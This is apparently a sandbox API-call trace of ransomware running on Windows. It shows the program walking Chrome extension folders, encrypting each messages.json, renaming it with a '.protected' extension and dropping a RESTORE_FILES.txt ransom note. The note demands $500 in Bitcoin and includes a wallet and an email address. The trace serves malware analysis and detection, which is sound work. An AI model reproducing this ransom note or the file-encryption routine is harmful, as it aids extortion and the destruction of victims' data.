(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.067] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.067] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.067] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.067] CloseHandle (hObject=0x164) returned 1 [0079.067] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0079.067] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned 141 [0079.067] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0079.067] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0079.067] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*") returned 143 [0079.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.067] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.067] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.067] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.067] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.067] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.067] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\.") returned 143 [0079.067] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.067] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.067] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.067] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.068] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.068] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.068] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.068] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\..") returned 144 [0079.068] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.068] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.068] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.068] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.068] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.068] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.069] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.069] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.069] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.069] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.069] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.070] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.070] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.070] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.070] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.070] CloseHandle (hObject=0x168) returned 1 [0079.070] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.protected") returned 165 [0079.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.protected")) returned 1 [0079.071] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.071] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.071] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0079.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.071] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.071] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.072] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.072] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.072] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.072] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.072] CloseHandle (hObject=0x164) returned 1 [0079.072] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0079.072] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned 141 [0079.072] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0079.072] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0079.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*") returned 143 [0079.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.072] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.072] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.072] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.072] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.072] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\.") returned 143 [0079.072] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.072] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.072] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.072] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.073] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.073] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.073] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.073] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\..") returned 144 [0079.073] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.073] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.073] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.073] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.073] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.073] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0079.074] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.074] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0079.074] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.074] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.074] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.075] CloseHandle (hObject=0x168) returned 1 [0079.075] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.protected") returned 165 [0079.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.protected")) returned 1 [0079.075] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.075] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.075] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0079.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.075] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.075] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.076] lstrlenA 